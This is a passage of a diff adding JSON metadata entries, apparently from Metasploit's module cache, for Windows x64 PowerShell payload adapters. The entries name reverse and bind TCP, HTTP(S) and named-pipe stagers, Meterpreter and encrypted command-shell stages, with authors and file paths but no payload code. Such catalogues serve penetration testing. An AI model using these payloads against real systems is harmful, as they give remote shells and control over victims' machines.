"cmd/windows/powershell/x64/custom/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/reverse_http", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/powershell/x64/custom/reverse_https": { + "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "agix", + "rwincey" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/reverse_https", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/powershell/x64/custom/reverse_named_pipe": { + "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_named_pipe", + "aliases": [], + "rank": 
300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/powershell/x64/custom/reverse_tcp": { + "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + 
"session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/powershell/x64/custom/reverse_tcp_rc4": { + "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/x64/custom/reverse_tcp_uuid": { + "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", 
+ "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/custom/reverse_winhttp": { + "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + 
"payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/powershell/x64/custom/reverse_winhttps": { + "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/powershell/x64/encrypted_shell/reverse_tcp": { + "name": "Powershell Exec, Windows Command Shell, Encrypted Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/encrypted_shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Matt Graeber", + "Shelby Pace" + ], + "description": "Execute an x64 payload from a command via 
PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/encrypted_shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/encrypted_shell/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/encrypted_shell", + "stager_refname": "windows/x64/encrypted_reverse_tcp" + }, + "payload_cmd/windows/powershell/x64/exec": { + "name": "Powershell Exec, Windows x64 Execute Command", + "fullname": "payload/cmd/windows/powershell/x64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nExecute an arbitrary command (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/exec", + "staged": false + }, + "payload_cmd/windows/powershell/x64/loadlibrary": { + "name": "Powershell Exec, Windows x64 LoadLibrary 
Path", + "fullname": "payload/cmd/windows/powershell/x64/loadlibrary", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "scriptjunkie", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nLoad an arbitrary x64 library path", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/loadlibrary", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/loadlibrary", + "staged": false + }, + "payload_cmd/windows/powershell/x64/messagebox": { + "name": "Powershell Exec, Windows MessageBox x64", + "fullname": "payload/cmd/windows/powershell/x64/messagebox", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "pasta " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a dialog via MessageBox using a customizable title, text & icon", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/messagebox", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": 
"windows/x64/messagebox", + "staged": false + }, + "payload_cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp": { + "name": "Powershell Exec, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + 
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/meterpreter/bind_named_pipe": { + "name": "Powershell Exec, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "UserExistsError" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + 
"needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/powershell/x64/meterpreter/bind_tcp": { + "name": "Powershell Exec, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/powershell/x64/meterpreter/bind_tcp_rc4": { + "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + 
"mihi", + "max3raza", + "RageLtMan" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/x64/meterpreter/bind_tcp_uuid": { + "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": 
"cmd/windows/powershell/x64/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/meterpreter/reverse_http": { + "name": "Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_http", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/powershell/x64/meterpreter/reverse_https": { + "name": "Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": 
"payload/cmd/windows/powershell/x64/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "agix", + "rwincey" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_https", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/powershell/x64/meterpreter/reverse_named_pipe": { + "name": "Powershell Exec, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + 
"autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/powershell/x64/meterpreter/reverse_tcp": { + "name": "Powershell Exec, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + 
"stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/powershell/x64/meterpreter/reverse_tcp_rc4": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/x64/meterpreter/reverse_tcp_uuid": { + "name": "Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support (Windows 
x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/meterpreter/reverse_winhttp": { + "name": "Powershell Exec, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + 
